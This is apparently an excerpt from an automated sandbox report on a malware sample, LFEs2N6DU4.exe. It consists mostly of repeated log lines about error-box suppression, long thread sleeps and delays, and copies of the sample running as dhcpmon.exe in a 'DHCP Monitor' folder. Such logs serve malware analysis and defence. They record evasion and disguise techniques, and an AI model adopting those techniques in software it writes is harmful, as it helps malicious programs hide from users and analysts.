Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe TID: 852	Thread sleep count: 1015 > 30	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe TID: 5380	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe TID: 5984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe TID: 5644	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe TID: 4072	Thread sleep count: 1012 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe TID: 6444	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe TID: 6152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6192	Thread sleep count: 1013 > 30	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6476	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6216	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6308	Thread sleep count: 1021 > 30	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6624	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6328	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe TID: 6536	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe TID: 6676	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe TID: 6756	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Window / User API: threadDelayed 1015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Window / User API: threadDelayed 2114	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Window / User API: threadDelayed 7393	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Window / User API: foregroundWindowGot 691	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Window / User API: threadDelayed 1012	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Window / User API: threadDelayed 1013	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Window / User API: threadDelayed 1021	Jump to behavior

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe

Process information queried: ProcessInformation

Jump to behavior

